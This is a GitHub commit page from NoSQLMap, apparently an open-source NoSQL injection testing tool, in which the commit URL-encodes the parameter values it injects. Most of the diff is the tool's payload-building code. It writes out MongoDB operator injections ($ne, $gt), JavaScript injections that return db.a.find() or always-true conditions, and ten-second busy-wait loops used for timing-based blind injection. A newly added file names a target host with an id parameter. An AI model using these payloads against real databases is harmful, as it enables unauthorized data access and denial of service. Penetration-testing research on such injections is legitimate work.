Permalink
Browse files

Use Urllib Quote for parameter value

  • Loading branch information...
abdilahrf committed Sep 23, 2017
1 parent ae0b461 commit b33ec8444ff0f67951f27842c7a0a5c813cc46d9
Showing with 22 additions and 19 deletions.
  1. +6 −5 nosqlmap.py
  2. +14 −14 nsmweb.py
  3. +2 −0 prison
View
@@ -1,3 +1,4 @@
# -*- coding: utf-8 -*-
#!/usr/bin/python
# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
# See the file 'doc/COPYING' for copying permission
@@ -55,11 +56,11 @@ def mainMenu():
mmSelect = True
while mmSelect:
os.system('clear')
  print " _ _ ___ ___ _ __ __           "
  print "| \| |___/ __|/ _ \| | | \/ |__ _ _ __ "
  print "| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \"
  print "|_|\_\___/___/\__\_\____|_| |_\__,_| .__/"
  print " v0.7 codingo@protonmail.com      |_|   "
print " _ _ ___ ___ _ __ __           "
print "| \| |___/ __|/ _ \| | | \/ |__ _ _ __ "
print "| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \\"
print("|_|\_\___/___/\__\_\____|_| |_\__,_| .__/")
print(" v0.7 codingo@protonmail.com      |_|   ")
print "\n"
print "1-Set options"
print "2-NoSQL DB Access Attacks"
View
@@ -915,24 +915,24 @@ def buildUri(origUri, randValue):
if paramName[x] in injOpt:
uriArray[0] += paramName[x] + "=" + randValue + "&"
uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
uriArray[8] += paramName[x] + "[$gt]=&"
uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
uriArray[14] += paramName[x] + "a'; return true; var dum='a"
uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
uriArray[15] += paramName[x] + "1; return true; var dum=2"
#Add values that can be manipulated for database attacks
uriArray[16] += paramName[x] + "=a\'; ---"
uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
uriArray[17] += paramName[x] + "=1; if ---"
uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
else:
uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
View
2 prison
@@ -0,0 +1,2 @@
prison-commissary.mysterious-hashes.net,80,/panda.php?id=1,GET,Not Set,Not Set,ON,OFF,
{}

0 comments on commit b33ec84

Please sign in to comment.